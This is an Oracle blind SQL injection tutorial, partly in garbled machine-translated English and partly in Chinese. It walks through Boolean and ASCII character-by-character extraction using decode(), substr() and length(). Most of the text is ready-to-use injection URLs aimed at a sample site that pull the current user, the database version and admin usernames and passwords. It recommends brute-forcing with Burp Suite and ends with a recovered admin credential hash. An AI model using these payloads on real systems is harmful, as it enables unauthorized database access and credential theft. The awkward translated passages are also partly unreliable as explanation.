0x01 decode function Boolean blind
decode (or field operation field, the value 1, value 2 and value 3)
The result of the function is running, when the calculated field or field is equal to a value of 1, the function returns a value of 2, and to 3
Of course the value 1, value 2 and value 3 may also be an expression, such that the function of some simple sql statement many
use methods:
Comparison of size
select decode (sign (variable variable 1- 2), - 1, variable 1, variable 2) from dual; - whichever is smaller
Sign () function in accordance with a value of 0, positive or negative, respectively, return 0,1, -1
For example:
Variable 10 = 1, variable 2 = 20
then the sign (1- Variable Variable 2) returns -1, decode a decoding result is "variable 1", to achieve the purpose of taking a smaller value.
SQL> select decode(sign(10-20),-1,10,20) from dual; DECODE(SIGN(10-20),-1,10,20) ---------------------------- 10
So this decode application function of our injection
Test the current user
select decode(user,'SYSTEM',1,0) from dual;
If the user system returns 1, not 0 is returned.
SQL> select decode(user,'SYSTEM',1,0) from dual; DECODE(USER,'SYSTEM',1,0) ------------------------- 1 SQL> select decode(user,'SYS',1,0) from dual; DECODE(USER,'SYS',1,0) ---------------------- 0
Injection point blind decode application
Determine whether the user is SCOTT
http://www.jsporcle.com/a.jsp?username=SMITH' and 1=(select decode(user,'SCOTT',1,0) from dual) --
The current can guess one by one with character, use the substr () function
http://www.jsporcle.com/a.jsp?username=SMITH' and 1=(select decode(substr(user,1,1),'S',1,0) from dual) --
Here we need only need to replace the contents of the investigation can not list them, such as querying Oracle version, to determine whether the version of the first character is O
http://www.jsporcle.com/a.jsp?username=SMITH' and 1=(select decode(substr((select banner from sys.v_$version where rownum=1),1,1),'O',1,0) from dual) --
获取当前用户
(select user from dual)
获取当前版本
(select banner from sys.v_$version where rownum=1)
获取当前admin表的帐号和密码
(select username||password from admin)
获取字符长度
select length(user) from dual --
select * from art where id=1 and 6=(select length(user) from dual) --
http://www.jsporcle.com/news.jsp?id=1 and 6=(select length(user) from dual) --
当前用户第一个字母的是否等于S 等于返回1否则返回0
(select decode(substr(user,1,1),'S',1,0) from dual) -- (select decode(substr(user,2,1),'Y',1,0) from dual) -- (select decode(substr(user,3,1),'S',1,0) from dual) -- (select decode(substr(user,4,1),'T',1,0) from dual) -- (select decode(substr(user,5,1),'E',1,0) from dual) -- (select decode(substr(user,6,1),'N',1,0) from dual) --
测试当前用户语句
http://www.jsporcle.com/news.jsp?id=1 and 1=(select decode(substr(user,1,1),'S',1,0) from dual) --
获取当前admin表的帐号和密码
select * from art where id=1 and 1=(select decode(substr((select username||password from admin),1,1),'a',1,0) from dual) http://www.jsporcle.com/news.jsp?id=1 and 1=(select decode(substr((select username%7c%7cpassword from admin),1,1),'a',1,0) from dual)
判断字符的字符
abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.
查询第二个的时候
http://www.jsporcle.com/news.jsp?id=1 and 1=(select decode(substr((select username%7c%7cpassword from admin),2,1),'d',1,0) from dual) --
大概知道这些函数的用法 跑脚本爆破即可 burpsuite为例
0x02 通用盲注方法 逐字猜解
先获取数据长度
37=(select length(username||password) from admin)
转码测试
http://www.jsporcle.com/news.jsp?id=1 and 37=(select length(username%7c%7cpassword) from admin)-- select * from art where id=1 and 37=(select length(username||password) from admin);
猜解ascii码
http://www.jsporcle.com/news.jsp?id=1 and (select ascii(substr(username%7c%7cpassword,1,1)) from admin)=97 --
同样 burp或脚本爆破即可
猜解结果: admine10adc3949ba59abbe56e057f20f883e